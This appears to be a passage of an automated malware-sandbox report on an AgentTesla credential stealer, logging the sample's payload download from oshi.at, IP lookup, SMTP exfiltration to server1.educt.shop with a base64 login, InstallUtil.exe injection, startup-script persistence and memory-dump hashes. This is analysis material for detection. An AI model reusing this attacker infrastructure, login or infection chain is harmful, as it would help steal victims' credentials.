                                                                                  Dec 3, 2024 15:16:46.550843000 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:46.930126905 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:16:46.977772951 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:17:46.883614063 CET49713587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:18:22.728344917 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:18:22.851254940 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:18:23.119896889 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:18:23.120029926 CET58749720162.254.34.31192.168.2.8
                                                                                  Dec 3, 2024 15:18:23.120081902 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:18:23.121831894 CET49720587192.168.2.8162.254.34.31
                                                                                  Dec 3, 2024 15:18:23.240056992 CET58749720162.254.34.31192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 15:15:43.380554914 CET | 54353 | 53 | 192.168.2.8 | 1.1.1.1
Dec 3, 2024 15:15:43.520683050 CET | 53 | 54353 | 1.1.1.1 | 192.168.2.8
Dec 3, 2024 15:16:03.640193939 CET | 55807 | 53 | 192.168.2.8 | 1.1.1.1
Dec 3, 2024 15:16:03.780316114 CET | 53 | 55807 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 15:15:43.380554914 CET | 192.168.2.8 | 1.1.1.1 | 0x770e | Standard query (0) | oshi.at | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:16:03.640193939 CET | 192.168.2.8 | 1.1.1.1 | 0x220b | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 15:15:43.520683050 CET | 1.1.1.1 | 192.168.2.8 | 0x770e | No error (0) | oshi.at | | 194.15.112.248 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:15:43.520683050 CET | 1.1.1.1 | 192.168.2.8 | 0x770e | No error (0) | oshi.at | | 5.253.86.15 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:16:03.780316114 CET | 1.1.1.1 | 192.168.2.8 | 0x220b | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:16:03.780316114 CET | 1.1.1.1 | 192.168.2.8 | 0x220b | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:16:03.780316114 CET | 1.1.1.1 | 192.168.2.8 | 0x220b | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                                                                  • oshi.at
                                                                                  • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49710 | 194.15.112.248 | 443 | 4920 | C:\Users\user\Desktop\Ref#1550238.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-03 14:15:45 UTC | 61 | OUT |
    GET /EqqP HTTP/1.1
    Host: oshi.at
    Connection: Keep-Alive
2024-12-03 14:15:46 UTC | 316 | IN |
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 03 Dec 2024 14:15:46 GMT
    Content-Type: application/octet-stream
    Content-Length: 997384
    Connection: close
    ETag: "862892d4964a747c945b938d4d1a2260"
    Content-Disposition: attachment; filename=RFmZ.dat
    Accept-Ranges: bytes
    Last-Modified: Mon, 02 Dec 2024 21:59:34 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49712 | 104.26.13.205 | 443 | 5520 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-03 14:16:05 UTC | 155 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                  Host: api.ipify.org
                                                                                  Connection: Keep-Alive
2024-12-03 14:16:05 UTC | 424 | IN | HTTP/1.1 200 OK
                                                                                  Date: Tue, 03 Dec 2024 14:16:05 GMT
                                                                                  Content-Type: text/plain
                                                                                  Content-Length: 12
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ec42c295f674411-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=614&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1780487&cwnd=231&unsent_bytes=0&cid=c6bb677c24ed1e40&ts=469&x=0"
2024-12-03 14:16:05 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                                                                  Data Ascii: 8.46.123.228


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49714 | 194.15.112.248 | 443 | 6740 | C:\Users\user\AppData\Roaming\vdvfyt.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-03 14:16:17 UTC | 61 | OUT | GET /EqqP HTTP/1.1
                                                                                  Host: oshi.at
                                                                                  Connection: Keep-Alive
2024-12-03 14:16:18 UTC | 316 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Tue, 03 Dec 2024 14:16:18 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 997384
                                                                                  Connection: close
                                                                                  ETag: "862892d4964a747c945b938d4d1a2260"
                                                                                  Content-Disposition: attachment; filename=RFmZ.dat
                                                                                  Last-Modified: Mon, 02 Dec 2024 21:59:34 GMT
                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49719 | 104.26.13.205 | 443 | 3908 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-03 14:16:41 UTC | 155 | OUT | GET / HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                  Host: api.ipify.org
                                                                                  Connection: Keep-Alive
2024-12-03 14:16:42 UTC | 425 | IN | HTTP/1.1 200 OK
                                                                                  Date: Tue, 03 Dec 2024 14:16:42 GMT
                                                                                  Content-Type: text/plain
                                                                                  Content-Length: 12
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ec42d0eff404405-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2967&min_rtt=1756&rtt_var=1524&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1662870&cwnd=221&unsent_bytes=0&cid=dff8bf6e0d6a9418&ts=455&x=0"
2024-12-03 14:16:42 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                                                                  Data Ascii: 8.46.123.228


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Dec 3, 2024 15:16:07.486469030 CET | 587 | 49713 | 162.254.34.31 | 192.168.2.8 | 220 server1.educt.shop ESMTP Postfix
Dec 3, 2024 15:16:07.489928007 CET | 49713 | 587 | 192.168.2.8 | 162.254.34.31 | EHLO 928100
Dec 3, 2024 15:16:07.879735947 CET | 587 | 49713 | 162.254.34.31 | 192.168.2.8 | 250-server1.educt.shop
                                                                                  250-PIPELINING
                                                                                  250-SIZE 204800000
                                                                                  250-ETRN
                                                                                  250-STARTTLS
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-AUTH=PLAIN LOGIN
                                                                                  250-ENHANCEDSTATUSCODES
                                                                                  250-8BITMIME
                                                                                  250-DSN
                                                                                  250 CHUNKING
Dec 3, 2024 15:16:07.880712032 CET | 49713 | 587 | 192.168.2.8 | 162.254.34.31 | AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
Dec 3, 2024 15:16:08.269876003 CET | 587 | 49713 | 162.254.34.31 | 192.168.2.8 | 334 UGFzc3dvcmQ6
Dec 3, 2024 15:16:08.677768946 CET | 587 | 49713 | 162.254.34.31 | 192.168.2.8 | 235 2.7.0 Authentication successful
Dec 3, 2024 15:16:08.683979034 CET | 49713 | 587 | 192.168.2.8 | 162.254.34.31 | MAIL FROM:<sendxambro@educt.shop>
Dec 3, 2024 15:16:09.093364954 CET | 587 | 49713 | 162.254.34.31 | 192.168.2.8 | 250 2.1.0 Ok
Dec 3, 2024 15:16:09.093625069 CET | 49713 | 587 | 192.168.2.8 | 162.254.34.31 | RCPT TO:<ambro@educt.shop>
Dec 3, 2024 15:16:09.501035929 CET | 587 | 49713 | 162.254.34.31 | 192.168.2.8 | 250 2.1.5 Ok
Dec 3, 2024 15:16:09.507378101 CET | 49713 | 587 | 192.168.2.8 | 162.254.34.31 | DATA
Dec 3, 2024 15:16:09.895960093 CET | 587 | 49713 | 162.254.34.31 | 192.168.2.8 | 354 End data with <CR><LF>.<CR><LF>
Dec 3, 2024 15:16:09.896934032 CET | 49713 | 587 | 192.168.2.8 | 162.254.34.31 | .
Dec 3, 2024 15:16:10.405380964 CET | 587 | 49713 | 162.254.34.31 | 192.168.2.8 | 250 2.0.0 Ok: queued as 47EA888F3F
Dec 3, 2024 15:16:44.066595078 CET | 587 | 49720 | 162.254.34.31 | 192.168.2.8 | 220 server1.educt.shop ESMTP Postfix
Dec 3, 2024 15:16:44.066879988 CET | 49720 | 587 | 192.168.2.8 | 162.254.34.31 | EHLO 928100
Dec 3, 2024 15:16:44.458098888 CET | 587 | 49720 | 162.254.34.31 | 192.168.2.8 | 250-server1.educt.shop
                                                                                  250-PIPELINING
                                                                                  250-SIZE 204800000
                                                                                  250-ETRN
                                                                                  250-STARTTLS
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-AUTH=PLAIN LOGIN
                                                                                  250-ENHANCEDSTATUSCODES
                                                                                  250-8BITMIME
                                                                                  250-DSN
                                                                                  250 CHUNKING
                                                                                  Dec 3, 2024 15:16:44.458395958 CET  49720  587  192.168.2.8  162.254.34.31  AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                                                  Dec 3, 2024 15:16:44.848861933 CET  587  49720  162.254.34.31  192.168.2.8  334 UGFzc3dvcmQ6
                                                                                  Dec 3, 2024 15:16:45.246509075 CET  587  49720  162.254.34.31  192.168.2.8  235 2.7.0 Authentication successful
                                                                                  Dec 3, 2024 15:16:45.246934891 CET  49720  587  192.168.2.8  162.254.34.31  MAIL FROM:<sendxambro@educt.shop>
                                                                                  Dec 3, 2024 15:16:45.638490915 CET  587  49720  162.254.34.31  192.168.2.8  250 2.1.0 Ok
                                                                                  Dec 3, 2024 15:16:45.638801098 CET  49720  587  192.168.2.8  162.254.34.31  RCPT TO:<ambro@educt.shop>
                                                                                  Dec 3, 2024 15:16:46.035428047 CET  587  49720  162.254.34.31  192.168.2.8  250 2.1.5 Ok
                                                                                  Dec 3, 2024 15:16:46.035665035 CET  49720  587  192.168.2.8  162.254.34.31  DATA
                                                                                  Dec 3, 2024 15:16:46.428548098 CET  587  49720  162.254.34.31  192.168.2.8  354 End data with <CR><LF>.<CR><LF>
                                                                                  Dec 3, 2024 15:16:46.430635929 CET  49720  587  192.168.2.8  162.254.34.31  .
                                                                                  Dec 3, 2024 15:16:46.930126905 CET  587  49720  162.254.34.31  192.168.2.8  250 2.0.0 Ok: queued as CB8D289030
                                                                                  Dec 3, 2024 15:18:22.728344917 CET  49720  587  192.168.2.8  162.254.34.31  QUIT
                                                                                  Dec 3, 2024 15:18:23.119896889 CET  587  49720  162.254.34.31  192.168.2.8  221 2.0.0 Bye


                                                                                  Target ID:0
                                                                                  Start time:09:15:42
                                                                                  Start date:03/12/2024
                                                                                  Path:C:\Users\user\Desktop\Ref#1550238.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Ref#1550238.exe"
                                                                                  Imagebase:0x2b0000
                                                                                  File size:348'128 bytes
                                                                                  MD5 hash:A31BCF203BB60F13DE83211AC9D44D06
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2528281598.0000000006AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2509223302.000000000274F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:09:16:02
                                                                                  Start date:03/12/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                  Imagebase:0xf90000
                                                                                  File size:42'064 bytes
                                                                                  MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2737945832.000000000332C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2737945832.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2737945832.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2737945832.0000000003334000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2736523204.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:09:16:14
                                                                                  Start date:03/12/2024
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                                                                                  Imagebase:0x7ff7cf9b0000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:09:16:14
                                                                                  Start date:03/12/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\vdvfyt.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\vdvfyt.exe"
                                                                                  Imagebase:0xe0000
                                                                                  File size:348'128 bytes
                                                                                  MD5 hash:A31BCF203BB60F13DE83211AC9D44D06
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2847393725.0000000003862000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 45%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:09:16:39
                                                                                  Start date:03/12/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                  Imagebase:0x950000
                                                                                  File size:42'064 bytes
                                                                                  MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3369187394.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3369187394.0000000002C94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3369187394.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3369187394.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false


                                                                                    Execution Graph

                                                                                    Execution Coverage:10.5%
                                                                                    Dynamic/Decrypted Code Coverage:95.3%
                                                                                    Signature Coverage:3.8%
                                                                                    Total number of Nodes:236
                                                                                    Total number of Limit Nodes:10
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4
                                                                                    • API String ID: 0-4088798008
                                                                                    • Opcode ID: e269c115b07a106622afdc9513cc30f89ab3080cf085e5301c99927d69e441c2
                                                                                    • Instruction ID: e65f58e576fa973858e5e5d5a5784bf2885237630671c34a52ad064ad243de09
                                                                                    • Opcode Fuzzy Hash: e269c115b07a106622afdc9513cc30f89ab3080cf085e5301c99927d69e441c2
                                                                                    • Instruction Fuzzy Hash: 16B2F674A40229CFDB54EFA8C994BADB7B6FF88700F158095E505AB3A9DB709C81CF50

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8
                                                                                    • API String ID: 0-4194326291
                                                                                    • Opcode ID: f07fc1396f804e18ee6e3f1dfded850452b34c4b05b710bf98fb254bcec450be
                                                                                    • Instruction ID: 9aa110743a6ac41a17b8d037a0b6073b86e71231c8566218e72cd871f5800592
                                                                                    • Opcode Fuzzy Hash: f07fc1396f804e18ee6e3f1dfded850452b34c4b05b710bf98fb254bcec450be
                                                                                    • Instruction Fuzzy Hash: E552D575E002298FDB65DF69C850AD9B7B1FF89310F5082EAD909A7355DB30AE81CF90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4
                                                                                    • API String ID: 0-4088798008
                                                                                    • Opcode ID: 6b1bfb2e68e427820e0379c6b87fef11e021bef88eb71ffd4ebc629a0b48ce9c
                                                                                    • Instruction ID: 21ce98020f2c724a62cc260d73b047ccf146a64c723f9dbf44cc3327d1384d1a
                                                                                    • Opcode Fuzzy Hash: 6b1bfb2e68e427820e0379c6b87fef11e021bef88eb71ffd4ebc629a0b48ce9c
                                                                                    • Instruction Fuzzy Hash: E322F974E40229CFDB64EF68C984BADB7B2BF88301F158099D509AB2A5DB70DD81CF50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 996 63b02ca-63b0366 NtProtectVirtualMemory 1000 63b0368-63b036e 996->1000 1001 63b036f-63b0394 996->1001 1000->1001
                                                                                    APIs
                                                                                    • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 063B0359
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2706961497-0
                                                                                    • Opcode ID: cbf657ad225f6e75c0cacb084a4b361d01f9d6167d274f9ba35e1bdeff33762d
                                                                                    • Instruction ID: a3cccc4abd7f74cc7a9c4b9f81f58d707a99f3df5693e9d86fad74df77bc706b
                                                                                    • Opcode Fuzzy Hash: cbf657ad225f6e75c0cacb084a4b361d01f9d6167d274f9ba35e1bdeff33762d
                                                                                    • Instruction Fuzzy Hash: C32103B5D013499FDB10DFAAD884AEEFBF5FF88310F60842AE559A3250C7759901CBA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1011 63b02d0-63b0366 NtProtectVirtualMemory 1014 63b0368-63b036e 1011->1014 1015 63b036f-63b0394 1011->1015 1014->1015
                                                                                    APIs
                                                                                    • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 063B0359
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2706961497-0
                                                                                    • Opcode ID: a51f2f1105b922ff3bce1c019cdcf59e944c5261737db3dc2b92d7fe2693a1fa
                                                                                    • Instruction ID: 0d8bee7122c2677910ba2b82110c744f52316165ede8a5a2345997087fda0363
                                                                                    • Opcode Fuzzy Hash: a51f2f1105b922ff3bce1c019cdcf59e944c5261737db3dc2b92d7fe2693a1fa
                                                                                    • Instruction Fuzzy Hash: 9E21E2B5D013499FDB10DFAAD884ADEFBF5FF48710F60842AE519A7250C779A904CBA0
                                                                                    APIs
                                                                                    • NtResumeThread.NTDLL(?,?), ref: 063B288E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: 71a7444f801374e012d8c338c02b640b4aa348c7283b26797d96eab7a18330c2
                                                                                    • Instruction ID: ab76d8d89224c063f0847a35c510364a0782e4029d1ef34dac9d872114de65ca
                                                                                    • Opcode Fuzzy Hash: 71a7444f801374e012d8c338c02b640b4aa348c7283b26797d96eab7a18330c2
                                                                                    • Instruction Fuzzy Hash: 12211571D003499FDB10DFAAC8847EFFBF8AF89610F508429D559A7240CB759945CFA1
                                                                                    APIs
                                                                                    • NtResumeThread.NTDLL(?,?), ref: 063B288E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: f368f37cac1ff21f219664b138c248c6c2741805a2ec80c056d9904b16ff3b97
                                                                                    • Instruction ID: f90c278cd8a1fb00d000f3fbe67dd8d93a2c413300c00eb8bc937cbace7f6eb5
                                                                                    • Opcode Fuzzy Hash: f368f37cac1ff21f219664b138c248c6c2741805a2ec80c056d9904b16ff3b97
                                                                                    • Instruction Fuzzy Hash: BF1117B1D003098FDB10DFAAC4847AFFBF4EF88610F50842AD519A7240CB799904CFA0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: h
                                                                                    • API String ID: 0-2439710439
                                                                                    • Opcode ID: d44e596255ed6d4bb7bac8f7fe07cdc6e9d307c330a206a5111968321192c197
                                                                                    • Instruction ID: da8b9404a06ffd26df6f3a694e7c15e1ef7202e9c97684cd0d17344a05cf812e
                                                                                    • Opcode Fuzzy Hash: d44e596255ed6d4bb7bac8f7fe07cdc6e9d307c330a206a5111968321192c197
                                                                                    • Instruction Fuzzy Hash: F9711875E04219CFEB55DF69D840BD9B7B2FF89304F4082AAE409A7254DB30AE85CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526216892.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5e70000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d0f40e767744775de85461397062418ac4f70eb7a956d196f86eb67e076cfcb0
                                                                                    • Instruction ID: 53d7e772f51aa8e106141f2679264626b766b40ba8c63de4e20ad2b8d83c7e27
                                                                                    • Opcode Fuzzy Hash: d0f40e767744775de85461397062418ac4f70eb7a956d196f86eb67e076cfcb0
                                                                                    • Instruction Fuzzy Hash: 9AA2B475A00228CFDB65CF69C984A9DBBB2FF89304F1581E9D549AB325DB319E81CF40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528730026.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6b80000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1fdfd519f798a8f2433aa4562ae14ac7d0688cec8cf52fc84c0ac450b0acf032
                                                                                    • Instruction ID: 462f66ae699552bd6bc5cbf7526d409a58d321db381ceed01b6348ec1bb0a694
